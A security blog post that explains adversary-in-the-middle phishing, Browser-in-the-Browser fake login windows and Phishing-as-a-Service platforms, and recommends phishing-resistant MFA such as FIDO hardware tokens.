return
Over the last few years we have made great strides in protecting our digital ecosystem, and in that sense we can say that we have matured. Cybersecurity has ceased to be an option and has become mandatory in most environments.
This maturation has allowed us to raise the minimum securityrequirements for a system, and that is where we can recognize 2FA as one more measure that has been adopted for authentication. In this post we will explore a bit of that context to answer the question: Are we doing security or are we just doing the minimum?
When approaching Phishing techniques, we have long since fallen quite short of just linking it to specially crafted emails, because that "art of deception" has rightly met our efforts to apply protection measures such as 2FA, and this has driven cybercriminals' interest in bypassing these measures (in a previous post we told about some 2FA bypass strategies).
This is how AiTM (Adversary In The Middle) has become especially relevant in recent times. In this technique, the attacker will act as a proxy to show us a real service and obtain our data in the process. In this way, no matter how many authentication factors are used, they will be intercepted and then forwarded to the service we trust, authentication is transparent to the user.
In this maturation in cybersecurity, people are not exempt, through awareness we have acquired tools to better respond to phishing cases. We look more closely at where we are entering our data, but that is where cybercriminals have focused and have exploited that trust by designing new techniques to involve us in the deception.
A website, at the end of the day, is nothing more than a set of visual elements to offer us something we want (or not). We have learned to rely on that top bar where we find the URL, but as it happens in a dream within a dream, how can we recognize that we are not yet inside the website? BitB (Browser In The Browser) is a technique specifically designed to show us a real and valid environment within a malicious website. This allows, as a child's play, to generate all the elements of a real site (including digital certificate browsing) within the context of the attacker's website.
The basic implementation of this attack consists of the design of a structure identical to the one recognized on the real site, but within the site controlled by the attacker, in a simple example:
These two techniques integrated at a phishing campaign can be schematized as follows:
We can see that the degree of complexity increases for the attackers, and as with any problem, they have also looked for a solution, or bought one.
PhaaS (Phishing as a Service) has emerged as an answer for attackers. They are intuitive, simple to deploy, "low-cost" interface platforms that have put the tools to deliver effective phishing campaigns into the hands of less technically experienced criminals. This can include customizable phishing kits, dynamic urls, payloads and activity tracking.
One of the campaigns recently investigated by Mandiant's team of analysts made use of a platform called "Caffeine". This platform had the particularity of allowing an open registration only with an email address (unlike others where there were other requirements). In addition, the platform included Russian and Chinese targets in its models, which was unusual. This service also had a lot of techniques to evade detection.
It is clear that this type of platforms put in malicious hands a set of tools to facilitate this type of attacks. How do we protect our environment then? Knowing that phishing techniques using AiTM render obsolete the authentication factors that make use of OTPs (One time password) typically delivered by email, SMS, etc., it is necessary to use another type of "phishing-proof" MFA.
We can find in this field, for example, hardware tokens (which concretely bind the device accessing the service within the same context as the hardware token), implementations of the FIDO authentication standard and models such as Microsoft's "Conditional Access" authentication.
Beyond the measures taken in authentication, it is clear that there is a new and emerging need to "train the awareness" of people in cybersecurity to be able to respond more naturally to these types of threats. Not all phishing variants will target the authentication process. In a future post we will look at different MFA methods around phishing-proof authentication, in particular the FIDO standard.
